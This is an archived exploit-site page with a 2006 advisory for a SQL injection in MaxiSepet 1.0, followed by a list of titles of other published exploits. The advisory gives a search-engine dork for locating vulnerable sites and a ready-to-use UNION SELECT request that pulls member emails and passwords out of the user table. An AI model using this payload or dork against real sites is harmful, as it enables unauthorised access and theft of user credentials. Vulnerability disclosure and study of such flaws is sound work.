exploits , vulnerabilities , articles , MaxiSepet <= 1.0 (link) SQL Injection Vulnerability

2006-06-11

MaxiSepet <= 1.0 (link) SQL Injection Vulnerability

Rated as : High Risk

#Method found by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=42
#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.

#Dork: "Copyright MaxiSepet �"

#How: Parameter link did not sanitized properly.

#Example: GET ->
http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL

#Example: GET ->
http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('�ye%20adi:%20<b>',email,'</b><br>','�ifre:%20<b>',sifre,'</b>')+from+uye+ORDER
BY email ASC

# nukedx.com [2006-06-11]
securitydot.net - 2006-06-11

Exploits - newest 10 RSS | More

2007-06-15 56696 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33811 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41926 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29021 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19510 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16492 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19157 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16355 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33286 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17017 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit